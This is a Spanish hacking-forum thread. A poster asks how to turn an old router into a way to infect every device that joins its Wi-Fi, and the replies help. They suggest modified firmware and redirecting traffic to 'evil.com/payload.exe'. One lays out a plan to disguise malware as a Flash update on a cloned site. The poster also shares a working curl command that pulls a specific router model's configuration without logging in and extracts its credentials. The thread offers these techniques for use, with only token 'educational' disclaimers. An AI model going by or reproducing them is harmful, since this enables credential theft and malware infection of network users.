[AYUDA] Exploits via Router

B4ckSw4p · 18 Abr 2020

Pues lo que habéis leído, me he encontrado con un viejo router en casa y he decidido poner mis dotes de ciberseguridad para saber si era capaz de sacar el usuario y pass que tenia puesto en su dia (y si he podido).

Ahora bien, quisiera saber si es posible poder cargar de alguna forma un exploit en el router para poder """"""""""""""""""""infectar"""""""""""""""" a todos los equipos que se conecten a su señal wifi. Me podéis echar una mano con eso?

Cabe destacar que todo lo que he hecho es para uso educativo y desarrollo personal, todos los equipos son de mi pertenencia y no estoy incumpliendo ninguna ley.

HxckzLxb2 · 18 Abr 2020

SantiagoAbascal_1936 dijo:
Pues lo que habéis leído, me he encontrado con un viejo router en casa y he decidido poner mis dotes de ciberseguridad para saber si era capaz de sacar el usuario y pass que tenia puesto en su dia (y si he podido).

Ahora bien, quisiera saber si es posible poder cargar de alguna forma un exploit en el router para poder """"""""""""""""""""infectar"""""""""""""""" a todos los equipos que se conecten a su señal wifi. Me podéis echar una mano con eso?

Cabe destacar que todo lo que he hecho es para uso educativo y desarrollo personal, todos los equipos son de mi pertenencia y no estoy incumpliendo ninguna ley.

Habría que modificar el firmware del router. Quizá camuflando algo como una actualización del firmware se pueda hacer algo. Saludos!

Usuario · 18 Abr 2020

SantiagoAbascal_1936 dijo:
Pues lo que habéis leído, me he encontrado con un viejo router en casa y he decidido poner mis dotes de ciberseguridad para saber si era capaz de sacar el usuario y pass que tenia puesto en su dia (y si he podido).

Ahora bien, quisiera saber si es posible poder cargar de alguna forma un exploit en el router para poder """"""""""""""""""""infectar"""""""""""""""" a todos los equipos que se conecten a su señal wifi. Me podéis echar una mano con eso?

Cabe destacar que todo lo que he hecho es para uso educativo y desarrollo personal, todos los equipos son de mi pertenencia y no estoy incumpliendo ninguna ley.

No se puede hacer algo que nada mas conectarse a tu red ya se infecten, lo que habria que hacer seria configurar una redireccion en X pagina para que redireccione a evil.com/payload.exe, lo descargan y si lo ejecutas pues ahi lo tienes.

destapeman · 18 Abr 2020

No es por quitarte mérito, te lo digo como consejo, los routers que instalan los ISP en tu casa tienen todos el USER y PASS por defecto, con una búsqueda en Google puedes encontrarlos.

Sería interesante que explicases el método que has seguido para lograr conseguir el USER/PASS del router.
¿Qué marca es y qué SO tiene instalado?

Como dice @Usuario lo más parecido que puedes hacer es redireccionar el tráfico a una web y que descargue el malware.

IDEAS:
-------

Te montas tú el servidor WEB y alojas el malware.
Sería interesante que desarrolles el malware también.
Lo escondes bajo una actualización de Adobe Flash Player por ejemplo. Básicamente que la descarga aparezca como una actualización del Adobe, hay herramientas para clonar webs.
¿Cómo consigues redireccionar el tráfico? enrutando todas las peticiones HTTP/HTTPS a tu servidor WEB, ¿si se quiere conectar a Youtube? "que pase por tu servidor WEB".

Esa es la forma laboriosa

La forma mas vaga sería descargarte el malware o pasar de montar el servidor y redireccionar directamente a la página donde está alojado el malware, lo único que habría que pensar como hacer pasar la página por algo legítimo xDD

Si alguien tiene mas ideas dpm ;) ;) ;)

Por cierto, he movido el post a la categoría correcta

B4ckSw4p · 18 Abr 2020

Antes que nada, muchas gracias a todos por aportar vuestras ideas, ahora voy a explicar de que router se trata y como he obtenido el usuario y contraseña.

B4ckSw4p · 18 Abr 2020

El router es un nc-wr644gv, este tipo de router tiene una vulnerabilidad y es que puedes descargarte su fichero de configuración sin necesidad de haber iniciado sesión. (Una joyita eh)

Entonces, en mi terminal de kalilinux use el siguiente comando: "curl -s "http://(ip vulnerable)/cgi-bin/config_download.cgi?action=download"|strings|grep -i password"

En esa url estamos indicando que queremos descargar el fiche de configuracion y a su vez, que nos busque la linea donde haya algo con el parametro "password".
Ahora claro, tenemos la contraseña, pero no el usuario, para eso tenemos que usar el mismo url pero cambiando el password por username.
Y obtendremos los siguientes datos:

No me hago responsable del uso que le podéis dar a esta información, todo lo escrito aquí ha sido con fines educativos.

@destapeman Espero que te haya gustado el post

destapeman · 18 Abr 2020

SantiagoAbascal_1936 dijo:
El router es un nc-wr644gv, este tipo de router tiene una vulnerabilidad y es que puedes descargarte su fichero de configuración sin necesidad de haber iniciado sesión. (Una joyita eh)

Entonces, en mi terminal de kalilinux use el siguiente comando: "curl -s "http://(ip vulnerable)/cgi-bin/config_download.cgi?action=download"|strings|grep -i password"

En esa url estamos indicando que queremos descargar el fiche de configuracion y a su vez, que nos busque la linea donde haya algo con el parametro "password".
Ahora claro, tenemos la contraseña, pero no el usuario, para eso tenemos que usar el mismo url pero cambiando el password por username.
Y obtendremos los siguientes datos:

Ver el archivo adjunto 2941

No me hago responsable del uso que le podéis dar a esta información, todo lo escrito aquí ha sido con fines educativos.

@destapeman Espero que te haya gustado el post

Buscar

Buscar

[AYUDA] Exploits via Router

🏴‍☠️ Consigue una invitación al foro para poder registrarte 🏴‍☠️

✅ Informática · Redes sociales y Emprendimiento · Trading/Forex · Criptomonedas · Códigos y ofertas ✅

B4ckSw4p

Miembro muy activo

HxckzLxb2

Con el miembro muy activo

Usuario

Miembro

destapeman

FUCK PUSSYS, YES BADASS

B4ckSw4p

Miembro muy activo

B4ckSw4p

Miembro muy activo

destapeman

FUCK PUSSYS, YES BADASS